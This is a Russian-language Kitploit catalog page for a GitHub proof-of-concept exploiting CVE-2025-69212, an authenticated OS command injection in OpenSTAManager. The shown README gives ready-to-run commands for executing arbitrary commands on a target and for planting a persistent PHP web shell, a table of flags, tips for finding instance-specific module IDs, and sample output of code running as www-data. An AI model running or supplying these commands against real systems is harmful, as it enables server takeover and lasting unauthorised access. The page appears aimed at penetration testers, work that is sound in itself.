Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-69212-PoC — CVE-2025-69212 - PoC внедрения команд ОС в OpenSTAManager | Kitploit
Инструменты/GitHubGitHub/alaeddine03/cve-2025-69212-poc
Генерация полезной нагрузкиЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и Управление
GitHubalaeddine03/cve-2025-69212-poc

CVE-2025-69212-PoC

CVE-2025-69212 - PoC внедрения команд ОС в OpenSTAManager

Репозиторий
593 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-69212 - PoC внедрения команд OS в OpenSTAManager

Использование

Установка зависимостей:

pip install -r requirements.txt

Выполнить одну команду и вывести результат:

python3 cve-2025-69212_poc.py -u http://target.com -U admin -P 'password' -c 'id'

Разместить постоянную PHP-оболочку:

python3 cve-2025-69212_poc.py -u http://target.com -U admin -P 'password' --shell

Параметры

ФлагОписание
-u, --urlБазовый URL целевого экземпляра
-U, --usernameИмя пользователя для аутентификации
-P, --passwordПароль для аутентификации
-c, --commandКоманда для выполнения, результат сохраняется в pwn_out.txt
--shellРазместить PHP-оболочку в files/shell.php вместо выполнения одной команды
--id-moduleID модуля для функции импорта счетов (по умолчанию: 14)
--id-pluginID плагина для функции импорта счетов (по умолчанию: 48)

id_module и id_plugin зависят от экземпляра. Если значения по умолчанию не работают, войдите в веб-интерфейс цели, перейдите к функции импорта электронных счетов и проверьте параметры запроса на вкладке "Сеть" вашего браузера.

Пример вывода

$ python3 cve-2025-69212_poc.py -u http://target.com -U admin -P 'password' -c 'id'
[*] Выполняется вход как admin ...
[+] Аутентификация прошла успешно.
[*] Формирование полезной нагрузки для выполнения: id
[*] Загрузка эксплойта в ZIP в id_module=14 id_plugin=48 ...
[*] Сервер ответил: HTTP 500 (500 после выполнения команды ожидаемо)
[*] Получение вывода команды из http://target.com/files/pwn_out.txt ...
[+] Вывод команды:
--------------------------------------------------
uid=33(www-data) gid=33(www-data) groups=33(www-data)
--------------------------------------------------
Скачать инструмент